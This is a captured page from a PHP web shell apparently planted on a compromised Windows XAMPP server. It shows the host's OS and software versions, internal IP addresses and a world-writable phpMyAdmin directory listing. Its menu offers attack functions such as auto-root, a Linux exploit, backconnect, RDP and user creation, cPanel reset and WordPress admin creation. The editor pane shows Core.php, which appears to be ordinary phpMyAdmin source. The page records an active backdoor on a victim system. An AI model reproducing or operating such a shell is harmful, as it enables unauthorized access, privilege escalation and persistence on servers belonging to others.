Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
phpMyAdmin /
libraries /
classes /
[ HOME SHELL ]
Name
Size
Permission
Action
Charsets
[ DIR ]
drwxrwxrwx
Config
[ DIR ]
drwxrwxrwx
Controllers
[ DIR ]
drwxrwxrwx
Database
[ DIR ]
drwxrwxrwx
Dbi
[ DIR ]
drwxrwxrwx
Di
[ DIR ]
drwxrwxrwx
Display
[ DIR ]
drwxrwxrwx
Engines
[ DIR ]
drwxrwxrwx
Gis
[ DIR ]
drwxrwxrwx
Navigation
[ DIR ]
drwxrwxrwx
Plugins
[ DIR ]
drwxrwxrwx
Properties
[ DIR ]
drwxrwxrwx
Rte
[ DIR ]
drwxrwxrwx
Server
[ DIR ]
drwxrwxrwx
Setup
[ DIR ]
drwxrwxrwx
Twig
[ DIR ]
drwxrwxrwx
Utils
[ DIR ]
drwxrwxrwx
Advisor.php
19.56
KB
-rw-rw-rw-
Bookmark.php
10.74
KB
-rw-rw-rw-
BrowseForeigners.php
11.15
KB
-rw-rw-rw-
CentralColumns.php
44.19
KB
-rw-rw-rw-
Charsets.php
6.14
KB
-rw-rw-rw-
CheckUserPrivileges.php
12.59
KB
-rw-rw-rw-
Config.php
57.38
KB
-rw-rw-rw-
Console.php
3.69
KB
-rw-rw-rw-
Core.php
38.31
KB
-rw-rw-rw-
CreateAddField.php
17.91
KB
-rw-rw-rw-
DatabaseInterface.php
104.47
KB
-rw-rw-rw-
Encoding.php
8.68
KB
-rw-rw-rw-
Error.php
13.34
KB
-rw-rw-rw-
ErrorHandler.php
17.17
KB
-rw-rw-rw-
ErrorReport.php
8.92
KB
-rw-rw-rw-
Export.php
42.76
KB
-rw-rw-rw-
File.php
21.29
KB
-rw-rw-rw-
FileListing.php
2.83
KB
-rw-rw-rw-
Font.php
5.54
KB
-rw-rw-rw-
Footer.php
10.6
KB
-rw-rw-rw-
Header.php
21.87
KB
-rw-rw-rw-
Import.php
56.56
KB
-rw-rw-rw-
Index.php
24.5
KB
-rw-rw-rw-
IndexColumn.php
4.44
KB
-rw-rw-rw-
InsertEdit.php
129.31
KB
-rw-rw-rw-
InternalRelations.php
17.42
KB
-rw-rw-rw-
IpAllowDeny.php
9.57
KB
-rw-rw-rw-
Language.php
4.31
KB
-rw-rw-rw-
LanguageManager.php
23.71
KB
-rw-rw-rw-
Linter.php
5.21
KB
-rw-rw-rw-
ListAbstract.php
2.51
KB
-rw-rw-rw-
ListDatabase.php
4.34
KB
-rw-rw-rw-
Logging.php
2.6
KB
-rw-rw-rw-
Menu.php
22.36
KB
-rw-rw-rw-
Message.php
19.32
KB
-rw-rw-rw-
Mime.php
916
B
-rw-rw-rw-
MultSubmits.php
23.64
KB
-rw-rw-rw-
Normalization.php
40.41
KB
-rw-rw-rw-
OpenDocument.php
8.52
KB
-rw-rw-rw-
Operations.php
81.25
KB
-rw-rw-rw-
OutputBuffering.php
3.71
KB
-rw-rw-rw-
ParseAnalyze.php
2.55
KB
-rw-rw-rw-
Partition.php
7.27
KB
-rw-rw-rw-
Pdf.php
4.37
KB
-rw-rw-rw-
Plugins.php
22.95
KB
-rw-rw-rw-
RecentFavoriteTable.php
12.04
KB
-rw-rw-rw-
Relation.php
79.64
KB
-rw-rw-rw-
RelationCleanup.php
15
KB
-rw-rw-rw-
Replication.php
5.75
KB
-rw-rw-rw-
ReplicationGui.php
21.23
KB
-rw-rw-rw-
Response.php
16.14
KB
-rw-rw-rw-
Sanitize.php
14.51
KB
-rw-rw-rw-
SavedSearches.php
11.94
KB
-rw-rw-rw-
Scripts.php
3.65
KB
-rw-rw-rw-
Session.php
7.62
KB
-rw-rw-rw-
Sql.php
82.09
KB
-rw-rw-rw-
SqlQueryForm.php
17.63
KB
-rw-rw-rw-
StorageEngine.php
13.75
KB
-rw-rw-rw-
SubPartition.php
3.55
KB
-rw-rw-rw-
SysInfo.php
1.61
KB
-rw-rw-rw-
SysInfoBase.php
822
B
-rw-rw-rw-
SysInfoLinux.php
2.16
KB
-rw-rw-rw-
SysInfoSunOS.php
1.89
KB
-rw-rw-rw-
SysInfoWINNT.php
3.27
KB
-rw-rw-rw-
SystemDatabase.php
3.97
KB
-rw-rw-rw-
Table.php
94.87
KB
-rw-rw-rw-
TablePartitionDefinition.php
6.64
KB
-rw-rw-rw-
Template.php
4.02
KB
-rw-rw-rw-
Theme.php
8.62
KB
-rw-rw-rw-
ThemeManager.php
10.42
KB
-rw-rw-rw-
Tracker.php
30.13
KB
-rw-rw-rw-
Tracking.php
40.26
KB
-rw-rw-rw-
Transformations.php
16.27
KB
-rw-rw-rw-
TwoFactor.php
7.14
KB
-rw-rw-rw-
Types.php
24.93
KB
-rw-rw-rw-
Url.php
8.32
KB
-rw-rw-rw-
UserPassword.php
9
KB
-rw-rw-rw-
UserPreferences.php
8.62
KB
-rw-rw-rw-
UserPreferencesHeader.php
4.13
KB
-rw-rw-rw-
Util.php
168.02
KB
-rw-rw-rw-
VersionInformation.php
6.92
KB
-rw-rw-rw-
ZipExtension.php
10.25
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Core.php
<?php /* vim: set expandtab sw=4 ts=4 sts=4: */ /** * Core functions used all over the scripts. * This script is distinct from libraries/common.inc.php because this * script is called from /test. * * @package PhpMyAdmin */ declare(strict_types=1); namespace PhpMyAdmin; use PhpMyAdmin\Di\Migration; use PhpMyAdmin\Display\Error as DisplayError; /** * Core class * * @package PhpMyAdmin */ class Core { /** * the whitelist for goto parameter * @static array $goto_whitelist */ public static $goto_whitelist = [ 'db_datadict.php', 'db_sql.php', 'db_events.php', 'db_export.php', 'db_importdocsql.php', 'db_multi_table_query.php', 'db_qbe.php', 'db_structure.php', 'db_import.php', 'db_operations.php', 'db_search.php', 'db_routines.php', 'export.php', 'import.php', 'index.php', 'pdf_pages.php', 'pdf_schema.php', 'server_binlog.php', 'server_collations.php', 'server_databases.php', 'server_engines.php', 'server_export.php', 'server_import.php', 'server_privileges.php', 'server_sql.php', 'server_status.php', 'server_status_advisor.php', 'server_status_monitor.php', 'server_status_queries.php', 'server_status_variables.php', 'server_variables.php', 'sql.php', 'tbl_addfield.php', 'tbl_change.php', 'tbl_create.php', 'tbl_import.php', 'tbl_indexes.php', 'tbl_sql.php', 'tbl_export.php', 'tbl_operations.php', 'tbl_structure.php', 'tbl_relation.php', 'tbl_replace.php', 'tbl_row_action.php', 'tbl_select.php', 'tbl_zoom_select.php', 'transformation_overview.php', 'transformation_wrapper.php', 'user_password.php', ]; /** * checks given $var and returns it if valid, or $default of not valid * given $var is also checked for type being 'similar' as $default * or against any other type if $type is provided * * <code> * // $_REQUEST['db'] not set * echo Core::ifSetOr($_REQUEST['db'], ''); // '' * // $_POST['sql_query'] not set * echo Core::ifSetOr($_POST['sql_query']); // null * // $cfg['EnableFoo'] not set * echo Core::ifSetOr($cfg['EnableFoo'], false, 'boolean'); // false * echo Core::ifSetOr($cfg['EnableFoo']); // null * // $cfg['EnableFoo'] set to 1 * echo Core::ifSetOr($cfg['EnableFoo'], false, 'boolean'); // false * echo Core::ifSetOr($cfg['EnableFoo'], false, 'similar'); // 1 * echo Core::ifSetOr($cfg['EnableFoo'], false); // 1 * // $cfg['EnableFoo'] set to true * echo Core::ifSetOr($cfg['EnableFoo'], false, 'boolean'); // true * </code> * * @param mixed $var param to check * @param mixed $default default value * @param mixed $type var type or array of values to check against $var * * @return mixed $var or $default * * @see self::isValid() */ public static function ifSetOr(&$var, $default = null, $type = 'similar') { if (! self::isValid($var, $type, $default)) { return $default; } return $var; } /** * checks given $var against $type or $compare * * $type can be: * - false : no type checking * - 'scalar' : whether type of $var is integer, float, string or boolean * - 'numeric' : whether type of $var is any number representation * - 'length' : whether type of $var is scalar with a string length > 0 * - 'similar' : whether type of $var is similar to type of $compare * - 'equal' : whether type of $var is identical to type of $compare * - 'identical' : whether $var is identical to $compare, not only the type! * - or any other valid PHP variable type * * <code> * // $_REQUEST['doit'] = true; * Core::isValid($_REQUEST['doit'], 'identical', 'true'); // false * // $_REQUEST['doit'] = 'true'; * Core::isValid($_REQUEST['doit'], 'identical', 'true'); // true * </code> * * NOTE: call-by-reference is used to not get NOTICE on undefined vars, * but the var is not altered inside this function, also after checking a var * this var exists nut is not set, example: * <code> * // $var is not set * isset($var); // false * functionCallByReference($var); // false * isset($var); // true * functionCallByReference($var); // true * </code> * * to avoid this we set this var to null if not isset * * @param mixed $var variable to check * @param mixed $type var type or array of valid values to check against $var * @param mixed $compare var to compare with $var * * @return boolean whether valid or not * * @todo add some more var types like hex, bin, ...? * @see https://secure.php.net/gettype */ public static function isValid(&$var, $type = 'length', $compare = null): bool { if (! isset($var)) { // var is not even set return false; } if ($type === false) { // no vartype requested return true; } if (is_array($type)) { return in_array($var, $type); } // allow some aliases of var types $type = strtolower($type); switch ($type) { case 'identic': $type = 'identical'; break; case 'len': $type = 'length'; break; case 'bool': $type = 'boolean'; break; case 'float': $type = 'double'; break; case 'int': $type = 'integer'; break; case 'null': $type = 'NULL'; break; } if ($type === 'identical') { return $var === $compare; } // whether we should check against given $compare if ($type === 'similar') { switch (gettype($compare)) { case 'string': case 'boolean': $type = 'scalar'; break; case 'integer': case 'double': $type = 'numeric'; break; default: $type = gettype($compare); } } elseif ($type === 'equal') { $type = gettype($compare); } // do the check if ($type === 'length' || $type === 'scalar') { $is_scalar = is_scalar($var); if ($is_scalar && $type === 'length') { return strlen((string) $var) > 0; } return $is_scalar; } if ($type === 'numeric') { return is_numeric($var); } return gettype($var) === $type; } /** * Removes insecure parts in a path; used before include() or * require() when a part of the path comes from an insecure source * like a cookie or form. * * @param string $path The path to check * * @return string The secured path * * @access public */ public static function securePath(string $path): string { // change .. to . return preg_replace('@\.\.*@', '.', $path); } // end function /** * displays the given error message on phpMyAdmin error page in foreign language, * ends script execution and closes session * * loads language file if not loaded already * * @param string $error_message the error message or named error message * @param string|array $message_args arguments applied to $error_message * * @return void */ public static function fatalError( string $error_message, $message_args = null ): void { /* Use format string if applicable */ if (is_string($message_args)) { $error_message = sprintf($error_message, $message_args); } elseif (is_array($message_args)) { $error_message = vsprintf($error_message, $message_args); } /* * Avoid using Response class as config does not have to be loaded yet * (this can happen on early fatal error) */ if (isset($GLOBALS['dbi']) && $GLOBALS['dbi'] !== null && isset($GLOBALS['PMA_Config']) && $GLOBALS['PMA_Config']->get('is_setup') === false && Response::getInstance()->isAjax()) { $response = Response::getInstance(); $response->setRequestStatus(false); $response->addJSON('message', Message::error($error_message)); } elseif (! empty($_REQUEST['ajax_request'])) { // Generate JSON manually self::headerJSON(); echo json_encode( [ 'success' => false, 'message' => Message::error($error_message)->getDisplay(), ] ); } else { $error_message = strtr($error_message, ['<br>' => '[br]']); $error_header = __('Error'); $lang = isset($GLOBALS['lang']) ? $GLOBALS['lang'] : 'en'; $dir = isset($GLOBALS['text_dir']) ? $GLOBALS['text_dir'] : 'ltr'; echo DisplayError::display(new Template(), $lang, $dir, $error_header, $error_message); } if (! defined('TESTSUITE')) { exit; } } /** * Returns a link to the PHP documentation * * @param string $target anchor in documentation * * @return string the URL * * @access public */ public static function getPHPDocLink(string $target): string { /* List of PHP documentation translations */ $php_doc_languages = [ 'pt_BR', 'zh', 'fr', 'de', 'it', 'ja', 'pl', 'ro', 'ru', 'fa', 'es', 'tr', ]; $lang = 'en'; if (isset($GLOBALS['lang']) && in_array($GLOBALS['lang'], $php_doc_languages)) { $lang = $GLOBALS['lang']; } return self::linkURL('https://secure.php.net/manual/' . $lang . '/' . $target); } /** * Warn or fail on missing extension. * * @param string $extension Extension name * @param bool $fatal Whether the error is fatal. * @param string $extra Extra string to append to message. * * @return void */ public static function warnMissingExtension( string $extension, bool $fatal = false, string $extra = '' ): void { /** @var ErrorHandler $error_handler */ global $error_handler; /* Gettext does not have to be loaded yet here */ if (function_exists('__')) { $message = __( 'The %s extension is missing. Please check your PHP configuration.' ); } else { $message = 'The %s extension is missing. Please check your PHP configuration.'; } $doclink = self::getPHPDocLink('book.' . $extension . '.php'); $message = sprintf( $message, '[a@' . $doclink . '@Documentation][em]' . $extension . '[/em][/a]' ); if ($extra != '') { $message .= ' ' . $extra; } if ($fatal) { self::fatalError($message); return; } $error_handler->addError( $message, E_USER_WARNING, '', 0, false ); } /** * returns count of tables in given db * * @param string $db database to count tables for * * @return integer count of tables in $db */ public static function getTableCount(string $db): int { $tables = $GLOBALS['dbi']->tryQuery( 'SHOW TABLES FROM ' . Util::backquote($db) . ';', DatabaseInterface::CONNECT_USER, DatabaseInterface::QUERY_STORE ); if ($tables) { $num_tables = $GLOBALS['dbi']->numRows($tables); $GLOBALS['dbi']->freeResult($tables); } else { $num_tables = 0; } return $num_tables; } /** * Converts numbers like 10M into bytes * Used with permission from Moodle (https://moodle.org) by Martin Dougiamas * (renamed with PMA prefix to avoid double definition when embedded * in Moodle) * * @param string|int $size size (Default = 0) * * @return integer */ public static function getRealSize($size = 0): int { if (! $size) { return 0; } $binaryprefixes = [ 'T' => 1099511627776, 't' => 1099511627776, 'G' => 1073741824, 'g' => 1073741824, 'M' => 1048576, 'm' => 1048576, 'K' => 1024, 'k' => 1024, ]; if (preg_match('/^([0-9]+)([KMGT])/i', $size, $matches)) { return (int) ($matches[1] * $binaryprefixes[$matches[2]]); } return (int) $size; } // end getRealSize() /** * Checks given $page against given $whitelist and returns true if valid * it optionally ignores query parameters in $page (script.php?ignored) * * @param string $page page to check * @param array $whitelist whitelist to check page against * @param boolean $include whether the page is going to be included * * @return boolean whether $page is valid or not (in $whitelist or not) */ public static function checkPageValidity(&$page, array $whitelist = [], $include = false): bool { if (empty($whitelist)) { $whitelist = self::$goto_whitelist; } if (empty($page)) { return false; } if (in_array($page, $whitelist)) { return true; } if ($include) { return false; } $_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } return false; } /** * tries to find the value for the given environment variable name * * searches in $_SERVER, $_ENV then tries getenv() and apache_getenv() * in this order * * @param string $var_name variable name * * @return string value of $var or empty string */ public static function getenv(string $var_name): string { if (isset($_SERVER[$var_name])) { return (string) $_SERVER[$var_name]; } if (isset($_ENV[$var_name])) { return (string) $_ENV[$var_name]; } if (getenv($var_name)) { return getenv($var_name); } if (function_exists('apache_getenv') && apache_getenv($var_name, true) ) { return apache_getenv($var_name, true); } return ''; } /** * Send HTTP header, taking IIS limits into account (600 seems ok) * * @param string $uri the header to send * @param bool $use_refresh whether to use Refresh: header when running on IIS * * @return void */ public static function sendHeaderLocation(string $uri, bool $use_refresh = false): void { if ($GLOBALS['PMA_Config']->get('PMA_IS_IIS') && mb_strlen($uri) > 600) { Response::getInstance()->disable(); $template = new Template(); echo $template->render('header_location', ['uri' => $uri]); return; } /* * Avoid relative path redirect problems in case user entered URL * like /phpmyadmin/index.php/ which some web servers happily accept. */ if ($uri[0] == '.') { $uri = $GLOBALS['PMA_Config']->getRootPath() . substr($uri, 2); } $response = Response::getInstance(); session_write_close(); if ($response->headersSent()) { trigger_error( 'Core::sendHeaderLocation called when headers are already sent!', E_USER_ERROR ); } // bug #1523784: IE6 does not like 'Refresh: 0', it // results in a blank page // but we need it when coming from the cookie login panel) if ($GLOBALS['PMA_Config']->get('PMA_IS_IIS') && $use_refresh) { $response->header('Refresh: 0; ' . $uri); } else { $response->header('Location: ' . $uri); } } /** * Outputs application/json headers. This includes no caching. * * @return void */ public static function headerJSON(): void { if (defined('TESTSUITE')) { return; } // No caching self::noCacheHeader(); // MIME type header('Content-Type: application/json; charset=UTF-8'); // Disable content sniffing in browser // This is needed in case we include HTML in JSON, browser might assume it's // html to display header('X-Content-Type-Options: nosniff'); } /** * Outputs headers to prevent caching in browser (and on the way). * * @return void */ public static function noCacheHeader(): void { if (defined('TESTSUITE')) { return; } // rfc2616 - Section 14.21 header('Expires: ' . gmdate(DATE_RFC1123)); // HTTP/1.1 header( 'Cache-Control: no-store, no-cache, must-revalidate,' . ' pre-check=0, post-check=0, max-age=0' ); header('Pragma: no-cache'); // HTTP/1.0 // test case: exporting a database into a .gz file with Safari // would produce files not having the current time // (added this header for Safari but should not harm other browsers) header('Last-Modified: ' . gmdate(DATE_RFC1123)); } /** * Sends header indicating file download. * * @param string $filename Filename to include in headers if empty, * none Content-Disposition header will be sent. * @param string $mimetype MIME type to include in headers. * @param int $length Length of content (optional) * @param bool $no_cache Whether to include no-caching headers. * * @return void */ public static function downloadHeader( string $filename, string $mimetype, int $length = 0, bool $no_cache = true ): void { if ($no_cache) { self::noCacheHeader(); } /* Replace all possibly dangerous chars in filename */ $filename = Sanitize::sanitizeFilename($filename); if (! empty($filename)) { header('Content-Description: File Transfer'); header('Content-Disposition: attachment; filename="' . $filename . '"'); } header('Content-Type: ' . $mimetype); // inform the server that compression has been done, // to avoid a double compression (for example with Apache + mod_deflate) $notChromeOrLessThan43 = PMA_USR_BROWSER_AGENT != 'CHROME' // see bug #4942 || (PMA_USR_BROWSER_AGENT == 'CHROME' && PMA_USR_BROWSER_VER < 43); if (strpos($mimetype, 'gzip') !== false && $notChromeOrLessThan43) { header('Content-Encoding: gzip'); } header('Content-Transfer-Encoding: binary'); if ($length > 0) { header('Content-Length: ' . $length); } } /** * Returns value of an element in $array given by $path. * $path is a string describing position of an element in an associative array, * eg. Servers/1/host refers to $array[Servers][1][host] * * @param string $path path in the array * @param array $array the array * @param mixed $default default value * * @return mixed array element or $default */ public static function arrayRead(string $path, array $array, $default = null) { $keys = explode('/', $path); $value =& $array; foreach ($keys as $key) { if (! isset($value[$key])) { return $default; } $value =& $value[$key]; } return $value; } /** * Stores value in an array * * @param string $path path in the array * @param array $array the array * @param mixed $value value to store * * @return void */ public static function arrayWrite(string $path, array &$array, $value): void { $keys = explode('/', $path); $last_key = array_pop($keys); $a =& $array; foreach ($keys as $key) { if (! isset($a[$key])) { $a[$key] = []; } $a =& $a[$key]; } $a[$last_key] = $value; } /** * Removes value from an array * * @param string $path path in the array * @param array $array the array * * @return void */ public static function arrayRemove(string $path, array &$array): void { $keys = explode('/', $path); $keys_last = array_pop($keys); $path = []; $depth = 0; $path[0] =& $array; $found = true; // go as deep as required or possible foreach ($keys as $key) { if (! isset($path[$depth][$key])) { $found = false; break; } $depth++; $path[$depth] =& $path[$depth - 1][$key]; } // if element found, remove it if ($found) { unset($path[$depth][$keys_last]); $depth--; } // remove empty nested arrays for (; $depth >= 0; $depth--) { if (! isset($path[$depth + 1]) || count($path[$depth + 1]) === 0) { unset($path[$depth][$keys[$depth]]); } else { break; } } } /** * Returns link to (possibly) external site using defined redirector. * * @param string $url URL where to go. * * @return string URL for a link. */ public static function linkURL(string $url): string { if (! preg_match('#^https?://#', $url)) { return $url; } $params = []; $params['url'] = $url; $url = Url::getCommon($params); //strip off token and such sensitive information. Just keep url. $arr = parse_url($url); parse_str($arr["query"], $vars); $query = http_build_query(["url" => $vars["url"]]); if ($GLOBALS['PMA_Config'] !== null && $GLOBALS['PMA_Config']->get('is_setup')) { $url = '../url.php?' . $query; } else { $url = './url.php?' . $query; } return $url; } /** * Checks whether domain of URL is whitelisted domain or not. * Use only for URLs of external sites. * * @param string $url URL of external site. * * @return boolean True: if domain of $url is allowed domain, * False: otherwise. */ public static function isAllowedDomain(string $url): bool { $arr = parse_url($url); // We need host to be set if (! isset($arr['host']) || strlen($arr['host']) == 0) { return false; } // We do not want these to be present $blocked = [ 'user', 'pass', 'port', ]; foreach ($blocked as $part) { if (isset($arr[$part]) && strlen((string) $arr[$part]) != 0) { return false; } } $domain = $arr["host"]; $domainWhiteList = [ /* Include current domain */ $_SERVER['SERVER_NAME'], /* phpMyAdmin domains */ 'wiki.phpmyadmin.net', 'www.phpmyadmin.net', 'phpmyadmin.net', 'demo.phpmyadmin.net', 'docs.phpmyadmin.net', /* mysql.com domains */ 'dev.mysql.com', 'bugs.mysql.com', /* mariadb domains */ 'mariadb.org', 'mariadb.com', /* php.net domains */ 'php.net', 'secure.php.net', /* Github domains*/ 'github.com', 'www.github.com', /* Percona domains */ 'www.percona.com', /* Following are doubtful ones. */ 'mysqldatabaseadministration.blogspot.com', ]; return in_array($domain, $domainWhiteList); } /** * Replace some html-unfriendly stuff * * @param string $buffer String to process * * @return string Escaped and cleaned up text suitable for html */ public static function mimeDefaultFunction(string $buffer): string { $buffer = htmlspecialchars($buffer); $buffer = str_replace(' ', ' ', $buffer); return preg_replace("@((\015\012)|(\015)|(\012))@", '<br>' . "\n", $buffer); } /** * Displays SQL query before executing. * * @param array|string $query_data Array containing queries or query itself * * @return void */ public static function previewSQL($query_data): void { $retval = '<div class="preview_sql">'; if (empty($query_data)) { $retval .= __('No change'); } elseif (is_array($query_data)) { foreach ($query_data as $query) { $retval .= Util::formatSql($query); } } else { $retval .= Util::formatSql($query_data); } $retval .= '</div>'; $response = Response::getInstance(); $response->addJSON('sql_data', $retval); exit; } /** * recursively check if variable is empty * * @param mixed $value the variable * * @return bool true if empty */ public static function emptyRecursive($value): bool { $empty = true; if (is_array($value)) { array_walk_recursive( $value, function ($item) use (&$empty) { $empty = $empty && empty($item); } ); } else { $empty = empty($value); } return $empty; } /** * Creates some globals from $_POST variables matching a pattern * * @param array $post_patterns The patterns to search for * * @return void */ public static function setPostAsGlobal(array $post_patterns): void { foreach (array_keys($_POST) as $post_key) { foreach ($post_patterns as $one_post_pattern) { if (preg_match($one_post_pattern, $post_key)) { Migration::getInstance()->setGlobal($post_key, $_POST[$post_key]); } } } } /** * Creates some globals from $_REQUEST * * @param string $param db|table * * @return void */ public static function setGlobalDbOrTable(string $param): void { $value = ''; if (self::isValid($_REQUEST[$param])) { $value = $_REQUEST[$param]; } Migration::getInstance()->setGlobal($param, $value); Migration::getInstance()->setGlobal('url_params', [$param => $value] + $GLOBALS['url_params']); } /** * PATH_INFO could be compromised if set, so remove it from PHP_SELF * and provide a clean PHP_SELF here * * @return void */ public static function cleanupPathInfo(): void { global $PMA_PHP_SELF; $PMA_PHP_SELF = self::getenv('PHP_SELF'); if (empty($PMA_PHP_SELF)) { $PMA_PHP_SELF = urldecode(self::getenv('REQUEST_URI')); } $_PATH_INFO = self::getenv('PATH_INFO'); if (! empty($_PATH_INFO) && ! empty($PMA_PHP_SELF)) { $question_pos = mb_strpos($PMA_PHP_SELF, '?'); if ($question_pos != false) { $PMA_PHP_SELF = mb_substr($PMA_PHP_SELF, 0, $question_pos); } $path_info_pos = mb_strrpos($PMA_PHP_SELF, $_PATH_INFO); if ($path_info_pos !== false) { $path_info_part = mb_substr($PMA_PHP_SELF, $path_info_pos, mb_strlen($_PATH_INFO)); if ($path_info_part == $_PATH_INFO) { $PMA_PHP_SELF = mb_substr($PMA_PHP_SELF, 0, $path_info_pos); } } } $path = []; foreach (explode('/', $PMA_PHP_SELF) as $part) { // ignore parts that have no value if (empty($part) || $part === '.') { continue; } if ($part !== '..') { // cool, we found a new part $path[] = $part; } elseif (count($path) > 0) { // going back up? sure array_pop($path); } // Here we intentionall ignore case where we go too up // as there is nothing sane to do } $PMA_PHP_SELF = htmlspecialchars('/' . implode('/', $path)); } /** * Checks that required PHP extensions are there. * @return void */ public static function checkExtensions(): void { /** * Warning about mbstring. */ if (! function_exists('mb_detect_encoding')) { self::warnMissingExtension('mbstring'); } /** * We really need this one! */ if (! function_exists('preg_replace')) { self::warnMissingExtension('pcre', true); } /** * JSON is required in several places. */ if (! function_exists('json_encode')) { self::warnMissingExtension('json', true); } /** * ctype is required for Twig. */ if (! function_exists('ctype_alpha')) { self::warnMissingExtension('ctype', true); } /** * hash is required for cookie authentication. */ if (! function_exists('hash_hmac')) { self::warnMissingExtension('hash', true); } } /** * Gets the "true" IP address of the current user * * @return string|bool the ip of the user * * @access private */ public static function getIp() { /* Get the address of user */ if (empty($_SERVER['REMOTE_ADDR'])) { /* We do not know remote IP */ return false; } $direct_ip = $_SERVER['REMOTE_ADDR']; /* Do we trust this IP as a proxy? If yes we will use it's header. */ if (! isset($GLOBALS['cfg']['TrustedProxies'][$direct_ip])) { /* Return true IP */ return $direct_ip; } /** * Parse header in form: * X-Forwarded-For: client, proxy1, proxy2 */ // Get header content $value = self::getenv($GLOBALS['cfg']['TrustedProxies'][$direct_ip]); // Grab first element what is client adddress $value = explode(',', $value)[0]; // checks that the header contains only one IP address, $is_ip = filter_var($value, FILTER_VALIDATE_IP); if ($is_ip !== false) { // True IP behind a proxy return $value; } // We could not parse header return false; } // end of the 'getIp()' function /** * Sanitizes MySQL hostname * * * strips p: prefix(es) * * @param string $name User given hostname * * @return string */ public static function sanitizeMySQLHost(string $name): string { while (strtolower(substr($name, 0, 2)) == 'p:') { $name = substr($name, 2); } return $name; } /** * Sanitizes MySQL username * * * strips part behind null byte * * @param string $name User given username * * @return string */ public static function sanitizeMySQLUser(string $name): string { $position = strpos($name, chr(0)); if ($position !== false) { return substr($name, 0, $position); } return $name; } /** * Safe unserializer wrapper * * It does not unserialize data containing objects * * @param string $data Data to unserialize * * @return mixed */ public static function safeUnserialize(string $data) { if (! is_string($data)) { return null; } /* validate serialized data */ $length = strlen($data); $depth = 0; for ($i = 0; $i < $length; $i++) { $value = $data[$i]; switch ($value) { case '}': /* end of array */ if ($depth <= 0) { return null; } $depth--; break; case 's': /* string */ // parse sting length $strlen = intval(substr($data, $i + 2)); // string start $i = strpos($data, ':', $i + 2); if ($i === false) { return null; } // skip string, quotes and ; $i += 2 + $strlen + 1; if ($data[$i] != ';') { return null; } break; case 'b': case 'i': case 'd': /* bool, integer or double */ // skip value to sepearator $i = strpos($data, ';', $i); if ($i === false) { return null; } break; case 'a': /* array */ // find array start $i = strpos($data, '{', $i); if ($i === false) { return null; } // remember nesting $depth++; break; case 'N': /* null */ // skip to end $i = strpos($data, ';', $i); if ($i === false) { return null; } break; default: /* any other elements are not wanted */ return null; } } // check unterminated arrays if ($depth > 0) { return null; } return unserialize($data); } /** * Applies changes to PHP configuration. * * @return void */ public static function configure(): void { /** * Set utf-8 encoding for PHP */ ini_set('default_charset', 'utf-8'); mb_internal_encoding('utf-8'); /** * Set precision to sane value, with higher values * things behave slightly unexpectedly, for example * round(1.2, 2) returns 1.199999999999999956. */ ini_set('precision', '14'); /** * check timezone setting * this could produce an E_WARNING - but only once, * if not done here it will produce E_WARNING on every date/time function */ date_default_timezone_set(@date_default_timezone_get()); } /** * Check whether PHP configuration matches our needs. * * @return void */ public static function checkConfiguration(): void { /** * As we try to handle charsets by ourself, mbstring overloads just * break it, see bug 1063821. * * We specifically use empty here as we are looking for anything else than * empty value or 0. */ if (extension_loaded('mbstring') && ! empty(ini_get('mbstring.func_overload'))) { self::fatalError( __( 'You have enabled mbstring.func_overload in your PHP ' . 'configuration. This option is incompatible with phpMyAdmin ' . 'and might cause some data to be corrupted!' ) ); } /** * The ini_set and ini_get functions can be disabled using * disable_functions but we're relying quite a lot of them. */ if (! function_exists('ini_get') || ! function_exists('ini_set')) { self::fatalError( __( 'The ini_get and/or ini_set functions are disabled in php.ini. ' . 'phpMyAdmin requires these functions!' ) ); } } /** * Checks request and fails with fatal error if something problematic is found * * @return void */ public static function checkRequest(): void { if (isset($_REQUEST['GLOBALS']) || isset($_FILES['GLOBALS'])) { self::fatalError(__("GLOBALS overwrite attempt")); } /** * protect against possible exploits - there is no need to have so much variables */ if (count($_REQUEST) > 1000) { self::fatalError(__('possible exploit')); } } /** * Sign the sql query using hmac using the session token * * @param string $sqlQuery The sql query * @return string */ public static function signSqlQuery($sqlQuery) { /** @var array $cfg */ global $cfg; $secret = $_SESSION[' HMAC_secret '] ?? ''; return hash_hmac('sha256', $sqlQuery, $secret . $cfg['blowfish_secret']); } /** * Check that the sql query has a valid hmac signature * * @param string $sqlQuery The sql query * @param string $signature The Signature to check * @return bool */ public static function checkSqlQuerySignature($sqlQuery, $signature) { /** @var array $cfg */ global $cfg; $secret = $_SESSION[' HMAC_secret '] ?? ''; $hmac = hash_hmac('sha256', $sqlQuery, $secret . $cfg['blowfish_secret']); return hash_equals($hmac, $signature); } }
Close
